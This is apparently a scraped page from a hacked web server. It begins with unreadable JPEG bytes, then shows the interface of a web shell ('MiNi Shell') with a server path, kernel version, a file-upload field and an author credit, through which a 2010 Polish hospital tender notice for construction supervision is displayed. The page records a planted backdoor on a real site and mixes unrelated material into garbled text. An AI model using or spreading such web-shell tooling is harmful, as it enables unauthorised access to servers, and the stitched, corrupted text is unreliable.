JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100126/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100126/22958-N-2010.html

<p class="kh_header"><b>Kamienna Góra: usługa pełnienia funkcji inspektora nadzoru  inwestorskiego  nad wykonaniem robót budowlanych polegających na budowie bloku operacyjnego na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp. z o. o. Niepublicznego Zakładu Opieki Zdrowotnej  Szpitala Powiatowego pn nr 2/2010</b><br>
<b>Numer ogłoszenia: 22958 - 2010; data zamieszczenia: 26.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowe Centrum Zdrowia w Kamiennej Górze Sp. z o.o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy , ul. Bohaterów Getta 10, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 075 7449033.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pcz.org.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczny Zakład Opieki Zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> usługa pełnienia funkcji inspektora nadzoru  inwestorskiego  nad wykonaniem robót budowlanych polegających na budowie bloku operacyjnego na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp. z o. o. Niepublicznego Zakładu Opieki Zdrowotnej  Szpitala Powiatowego pn nr 2/2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Powiatowe  Centrum Zdrowia w Kamiennej Górze  Sp. z o. o. Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy  zaprasza  do udziału w postępowaniu prowadzonym w trybie przetargu nieograniczonego nr 2/2010  na usługę pełnienia funkcji inspektora nadzoru  inwestorskiego nad wykonaniem robót budowlanych polegających na budowie bloku operacyjnego na potrzeby  Powiatowego Centrum Zdrowia   w Kamiennej Górze Sp. z o. o. Niepublicznego Zakładu Opieki Zdrowotnej  Szpitala Powiatowego realizowanego   w ramach   projektu  nr WND-RPDS.08.01.00-02-041/08, pt.Poprawa jakości opieki zdrowotnej poprzez budowę bloku operacyjnego w Powiatowym Centrum Zdrowia w Kamiennej Górze sp zoo N ZOZ Szpital Powiatowy - Działania 8.1 Poprawa jakości opieki zdrowotnej w Priorytecie VIII Modernizacja infrastruktury ochrony zdrowia na Dolnym Śląsku (Zdrowie) Regionalnego Programu Operacyjnego  dla Województwa Dolnośląskiego na lata 2007 - 2013 (nabór 6/S/8.1/2008).
     Inspektor nadzoru inwestorskiego wyłoniony w drodze niniejszego przetargu  w granicach posiadanego umocowania niniejszą umową będzie  przedstawicielem Inwestora, jako zleceniodawcy w ramach umowy zawartej z wykonawcą robót budowlanych i będzie reprezentował  interesy Inwestora na budowie przez sprawowanie kontroli zgodności realizacji robót budowlanych z dokumentacją,  specyfikacjami technicznymi, przepisami, zasadami wiedzy technicznej oraz postanowieniami warunków umowy.  
      Inspektor nadzoru inwestorskiego  jest  odpowiedzialny  za należyte wykonanie  umowy.
 Do podstawowych obowiązków Inspektora nadzoru należy:

1Reprezentowanie Zamawiającego na terenie budowy przez sprawowanie kontroli zgodności jej realizacji z projektem budowlanym, Specyfikacją techniczną wykonania i odbioru robót, Polskimi Normami, przepisami prawa polskiego i wspólnotowego UE, zasadami wiedzy technicznej oraz umową z wykonawcą robót budowlanych. 
2Sprawdzanie jakości wykonywanych robót oraz wbudowywanych wyrobów budowlanych.
3Sprawdzanie i odbiór robót budowlanych ulegających zakryciu lub zanikających, uczestniczenie w próbach i odbiorach technicznych instalacji, urządzeń technicznych i przewodów kominowych oraz przygotowanie i udział w czynnościach odbioru gotowego obiektu budowlanego i przekazywanie go do użytkowania.
4Uczestnictwo w przekazaniu terenu budowy.
5Potwierdzanie faktycznie wykonanych robót oraz usunięcia wad.
6Sprawdzanie i aprobowanie wystawianych przez wykonawcę robót budowlanych faktur i załączników do niej.
7Wydawanie kierownikowi robót poleceń (potwierdzonych wpisem do dziennika budowy) dotyczących: usunięcia nieprawidłowości lub zagrożeń, wykonania prób lub badań, także wymagających odkrycia robót lub elementów zakrytych oraz przedstawienia ekspertyz dotyczących prowadzonych robót do obrotu i stosowania w budownictwie wyrobów budowlanych oraz urządzeń technicznych
8Informowanie na piśmie Zamawiającego o zagrożeniach w terminowej realizacji robót budowlanych w odniesieniu do zawartych umów.
9żądanie od kierownika robot dokonania poprawek bądź ponownego wykonania wadliwie wykonanych robót, a także wstrzymania dalszych robót budowlanych w przypadku,  gdyby ich kontynuacja mogła wywołać zagrożenie bądź spowodować niedopuszczalną niezgodność z dokumentacją określoną w Rozdziale I niniejszej umowy.
10Zgłaszanie Zamawiającemu zastrzeżeń do projektu i dokonywanie stosownych uzgodnień lub wyjaśnień z Projektantem oraz typowanie ewentualnych robót dodatkowych.
11Kontrola oznakowania miejsca robót zgodnie z prawem budowlanym oraz zasadami ustanowionymi i opublikowanymi na stronie internetowej Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013.
12Uczestnictwo w odbiorze końcowym robót budowlanych.
13Uczestniczenie w terminach wskazanych przez Zamawiającego  w minimum 3 przeglądach pogwarancyjnych w ciągu  36 miesięcy licząc od daty podpisania końcowego,  bezusterkowego  protokołu odbioru robót budowlanych bez dodatkowego wynagrodzenia - pod rygorem obciążenia Inspektora nadzoru karą umowną w wysokości 5% wartości brutto umowy.
14Zarządzenie nadzoru i przeprowadzenie kontroli wszystkiego co jest przygotowywane lub wytwarzane w celu dostawy na potrzeby realizacji robót. W tym celu Wykonawca (Inspektor nadzoru) może domagać się od wykonawcy robót budowlanych przeprowadzenia takich testów, jakie uzna za konieczne, które przewidziane  są w specyfikacji technicznej wykonania i odbioru robót aby ustalić czy materiały i przedmioty są wymaganej jakości. Może on żądać od wykonawcy robót zastąpienia lub poprawienia w zależności od sytuacji pozycji nie spełniających warunków specyfikacji technicznej wykonania i odbioru robót, nawet po ich zainstalowaniu. 

15Inicjowanie, prowadzenie odpraw inwestycyjnych  raz na 2 tygodnie w terminach ustalonych przez uczestników procesu inwestycyjnego (tj. Inspektor, Wykonawca robót budowlanych, Zamawiający) oraz sporządzanie protokołów z tych spotkań.
16    W  trakcie wykonywania swoich obowiązków Inspektor nadzoru  inwestorskiego nie będzie ujawniał informacji,           które otrzymał dla celów sprawowanego nadzoru i kontroli o prowadzeniu przedsięwzięć za wyjątkiem przekazywania  ich tym władzom, którym jest to niezbędne.
17    Inspektor nadzoru inwestorskiego nie jest upoważniony do wydawania   wykonawcy robót budowlanych poleceń  realizacji robót zamiennych lub dodatkowych bez pisemnej zgody Inwestora. 
18     Jeżeli w umowie wyraźnie nie postanowiono inaczej Inspektor nadzoru inwestorskiego nie ma prawa   zwolnić   wykonawcy robót budowlanych z jakiegokolwiek z jego obowiązków.
19    Inspektor nadzoru inwestorskiego  ponosi wobec Inwestora  odpowiedzialność za wyrządzone szkody, będące normalnym następstwem nie wykonania lub nienależytego wykonania przedmiotu umowy, ocenianego  w granicach przewidzianych dla umów starannego działania. (Nie ponosi natomiast odpowiedzialności za  szkody wynikające z nie wykonania lub nienależytego wykonania zobowiązań wykonawcy robót oraz  Inwestora  lub innych uczestników procesu inwestycyjnego, chyba że zaakceptował czynności powodujące  powstanie szkody).
 
       Lokalizację inwestycji ustalono na działce według ewidencji gruntów nr 139/1 obręb 3, położonej przy ul. Bohaterów Getta 10 w Kamiennej Górze na podstawie decyzji Nr 008/2008/CP  z dn. 27.10.2008r. AGN 7331-029/08 wydanej przez Burmistrza Miasta Kamiennej Góry.
       

            Szczegółowy zakres i lokalizację przedsięwzięcia przedstawia:

1)  dokumentacja   opracowana   przez WW PROJEKT Wyrostek  Jacek, 58-400 Kamienna  Góra, ul. Papieża Jana  Pawła II/11a w roku 2009,
 
2)harmonogram rzeczowo/finansowy realizacji projektu,

3)prawomocna administracyjna decyzja nr 288/09 z dn. 19.11.2009r. pozwolenia na budowę bloku operacyjnego na potrzeby Powiatowego Centrum Zdrowia w Kamiennej Górze, na działkach  wg ewidencji gruntów nr 139/1 i 102/1 obr. 3 Kamienna Góra  wydana  przez  Burmistrza Miasta Kamiennej Góry, 

4)decyzja  Nr 008/2008/CP z dn. 27.10.2008r.  wydana przez Burmistrza Miasta Kamiennej Góry ustalająca lokalizację  inwestycji,

5)wizualizacja przyszłego bloku operacyjnego..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9, 71.63.10.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie wymaga się wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O zamówienie mogą ubiegać się wykonawcy,   spełniający   warunki dotyczące:
a)nie podlegania  wykluczeniu na podstawie art. 24 ust. 1 pkt. 1 - 10 ustawy Pzp; 
b)spełniania  warunków określonych  w art. 22 ust.1 pkt.  1 - 4 ustawy Pzp;
c)posiadania uprawnień do wykonywania działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
d) posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia   a w szczególności:
dysponują osobami posiadającymi uprawnienia do pełnienia funkcji inspektora nadzoru  stosownie do przepisów ustawy z dnia 7 lipca 1994r. Prawo budowlane (t. j. Dz. U. Nr 156, poz. 1118 z 2006r. z późn. zmn.) w zakresie:
       -      robót ogólnobudowlanych, 
       -       instalacji i sieci wodociągowej, kanalizacji sanitarnej, wentylacji i c. o. ,
       -       instalacji i sieci  elektroenergetycznych. 
e)ubezpieczenia  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.

Warunki te będą spełnione przez Wykonawcę, jeżeli potwierdzą  je dokumenty, o których mowa w rozdziale III. Ocena powyższych  warunków wymaganych od oferentów zostanie dokonana na podstawie złożonych wraz z ofertą oświadczeń, dokumentów i wykazów, o których mowa w rozdziale III   
wg formuły spełnia - nie spełnia.
Nie spełnienie chociażby jednego warunku skutkować będzie wykluczeniem oferenta z postępowania..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia spełniania warunków udziału w postępowaniu Wykonawcy ubiegający się o uzyskanie zamówienia dostarczą zgodnie z   poniższym wykazem wypełnione  oświadczenia i dokumenty (które należy zaparafować i przedstawić w formie załączników do oferty, stanowiących integralną jej część):
1	 załączniki: 
 
1.1formularz ofertowy zał nr a
1.2oświadczenie w sprawie stosowania się do siwz zał nr b
1.3formularz upoważnienia do podpisania oferty zał nr c*
1.4formularz cenowy  nr  d 
1.5projekt  umowy zał nr e 
1.6podwykonawcy zał nr f

2.W celu wykazania braku podstaw do wykluczenia z postępowania o udzielenie zamówienia wykonawcy w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp  Zamawiający żąda przedłożenia  następujących dokumentów (w formie oryginału lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę):
-       oświadczenia o braku podstaw do wykluczenia - zał 1, 
2.1 W celu wykazania spełniania przez Wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy Pzp    
  Zamawiający żąda przedłożenia  następujących dokumentów:
    -     wykazu osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za
          świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia   niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o   podstawie do dysponowania tymi osobami  - zał A,**
    -  oświadczenia, że osoby, które będą  uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień  zał nr B,
      -  opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony   od  odpowiedzialności  cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia - zał nr C, 
*    Załącznik wypełnić w  przypadku gdy oferta będzie podpisywana przez pełnomocnika  (nie wyszczególniony w    aktualnym KRS lub wpisie do  ewidencji działalności gospodarczej), czy jednego z konsorcjantów podmiotu  składającego ofertę. W  przypadku gdy oferta będzie podpisywana przez upełnomocnionego przedstawiciela firmy wyszczególnionego w aktualnym   KRS   lub  aktualnym zaświadczeniu o wpisie do ewidencji działalności   gospodarczej dany załącznik nie jest konieczny do wypełnienia i załączenia do oferty. 

**    Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia. Jeżeli wykonawca, wykazując spełnianie warunków wymaganych w niniejszej specyfikacji, polega na zasobach innych podmiotów, a podmioty te będą brały udział w realizacji części zamówienia, zamawiający nie żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów potwierdzających spełnienie warunków udziału w postępowaniu.

UWAGA:


Załączniki  nr  B i C  sporządza sam Wykonawca!

Wyżej wymienione dokumenty należy wypełnić w takiej formie, jak to zostało podane we wzorach.  Zamawiający informuje, ze brak jakiegokolwiek ww. dokumentu będzie skutkowało wykluczeniem z postępowania z zastrzeżeniem art. 24 i art. 26 ustawy..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.pcz.org.pl/.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> POWIATOWE  CENTRUM ZDROWIA w KAMIENNEJ GÓRZE  Sp. z o. o. 
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 KAMIENNA GÓRA
ul. Bohaterów Getta 10, woj. dolnośląskie.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.02.2010 godzina 10:15, miejsce: POWIATOWE  CENTRUM ZDROWIA w KAMIENNEJ GÓRZE  Sp. z o. o. 
Niepubliczny Zakład Opieki Zdrowotnej Szpital Powiatowy 
58-400 KAMIENNA GÓRA
ul. Bohaterów Getta 10, woj. dolnośląskie 
S E K R E T A R I A.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com